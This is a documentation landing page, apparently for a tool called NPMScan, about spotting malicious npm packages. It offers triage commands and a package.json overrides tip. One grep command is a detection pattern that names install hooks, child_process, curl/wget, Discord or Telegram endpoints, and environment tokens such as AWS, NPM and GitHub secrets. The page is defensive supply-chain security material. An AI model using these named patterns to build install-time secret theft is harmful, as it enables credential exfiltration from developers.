Required Reading
~5 min

NPM Malware: What Actually Makes a Package Dangerous

This hub keeps docs practical. Jump straight into triage, flags, mitigations, and playbooks — no walls of text.

Overview

The core risk is code that runs during installation. These pages break down detection signals, quick commands, and incident playbooks you can use right now.

Why NPMScan

Motivation, how it’s different, and roadmap in one place.

Fast Triage

Copy-paste commands to verify scripts, grep tarballs, and check maintainers.

Auto‑Score Flags

Concrete signals you can programmatically score to block risky upgrades.

Mitigations

CI patterns that actually reduce install‑time exfil and surprise payloads.

Incident Playbooks

Step-by-step actions for postinstall binaries, typosquats, and supply‑chain hits.

Dangerous Behaviors

Common malicious patterns with crisp examples you can recognize quickly.

About child_process

When it’s fine vs. high‑risk, and what combos mean trouble.

Quick Actions

Inspect scripts
npm view <pkg>@<ver> scripts --json
Download and grep the tarball
npm pack <pkg>@<ver> && tar -xzf <pkg>-<ver>.tgz -C pkg && \
grep -RInE 'preinstall|postinstall|prepare|child_process|execSync|spawn|curl|wget|Invoke-WebRequest|discordapp|telegram|process\.env\.(AWS|NPM|GITHUB|TOKEN|KEY|SECRET)' pkg/
Check maintainers & publish history
npm view <pkg> maintainers time --json

Package.json Tips

Tips list:

  • Use overrides for safety when a risky release lands or transitive versions mismatch. This forces a known‑good version across your tree until upstream fixes.
    {
  "overrides": {
    "react": "^18.3.1",
    "react-dom": "^18.3.1"
  }
}